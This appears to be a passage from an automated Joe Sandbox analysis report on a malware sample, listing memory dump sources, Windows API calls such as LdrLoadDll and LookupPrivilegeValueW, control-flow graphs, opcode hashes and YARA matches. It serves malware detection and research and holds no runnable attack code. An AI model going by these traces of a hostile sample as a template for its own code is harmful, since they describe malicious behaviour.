                                  • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                  • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                  • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                  • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                  • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                  • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                  • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                  • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                  • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                  • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                  • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                  • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                  • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                  • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                  • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                  • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                  • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                  • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                  • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                  • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                  • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                  • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                  • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                  • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                  • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                  • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                  • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                  • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                  • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                  • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                  • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                  • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                  • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                  • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                  • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                  • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                  • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                  • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                  • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                  • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                  • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                  • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                  • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                  • Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
                                  • Opcode Fuzzy Hash: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                  • Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 11 41a5f0-41a621 call 41af20 RtlAllocateHeap
                                  APIs
                                  • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: &EA
                                  • API String ID: 1279760036-1330915590
                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 209 40830c-40835a call 41be20 call 41c9c0 call 40ace0 call 414e40 218 40835c-40836e PostThreadMessageW 209->218 219 40838e-408392 209->219 220 408370-40838a call 40a470 218->220 221 40838d 218->221 220->221 221->219
                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 2b1ced85cfafdd5732d96565cd9edafc066557c860400f298315d795c27a5101
                                  • Instruction ID: 05aaebecf39ec013da95658d58dee1c039a2fd93af06260385d1554cbd482746
                                  • Opcode Fuzzy Hash: 2b1ced85cfafdd5732d96565cd9edafc066557c860400f298315d795c27a5101
                                  • Instruction Fuzzy Hash: EC01D471A8032877E720A6958C03FFE772C6B40B54F05012AFF04BA1C1E6A8690642EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 224 408310-40831f 225 408328-40835a call 41c9c0 call 40ace0 call 414e40 224->225 226 408323 call 41be20 224->226 233 40835c-40836e PostThreadMessageW 225->233 234 40838e-408392 225->234 226->225 235 408370-40838a call 40a470 233->235 236 40838d 233->236 235->236 236->234
                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 2b8d0fafe82a707928844ec316f7e0105081546aa8e26e9dc354d60cbf214f5e
                                  • Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
                                  • Opcode Fuzzy Hash: 2b8d0fafe82a707928844ec316f7e0105081546aa8e26e9dc354d60cbf214f5e
                                  • Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 257 40acd3-40acdf 258 40ace1-40ad09 call 41cc10 257->258 259 40ad36-40ad3e 257->259 264 40ad0b-40ad0e 258->264 265 40ad0f-40ad1d call 41d030 258->265 260 40ad40-40ad54 LdrLoadDll 259->260 261 40ad57-40ad5a 259->261 260->261 268 40ad2d-40ad30 265->268 269 40ad1f-40ad2a call 41d2b0 265->269 268->259 271 40ad31 call 41b460 268->271 269->268 271->259
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: e90e30740199396d57f7cd7bed67e18ce7eee6ee49a4a5d75ff6d29f11778ce5
                                  • Instruction ID: 0bfba143c35a2662ea369b5dee50b939225e83d9b4356896b7ce44725816b03a
                                  • Opcode Fuzzy Hash: e90e30740199396d57f7cd7bed67e18ce7eee6ee49a4a5d75ff6d29f11778ce5
                                  • Instruction Fuzzy Hash: CAF0A475E0020DABDF10DAD1D882FDDB3B99F04308F0081A5ED1C9B680F634DA558B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 276 41a781-41a7aa call 41af20 278 41a7af-41a7c4 LookupPrivilegeValueW 276->278
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 6c355d2cbf5d1b4ed7558bdf3e9a25f7b7103ffe2787569f64ceecb3d4f9df02
                                  • Instruction ID: b018fd4c02568a20dce40f53dd357ebc4a22aed1888aa1fead350740c09b2497
                                  • Opcode Fuzzy Hash: 6c355d2cbf5d1b4ed7558bdf3e9a25f7b7103ffe2787569f64ceecb3d4f9df02
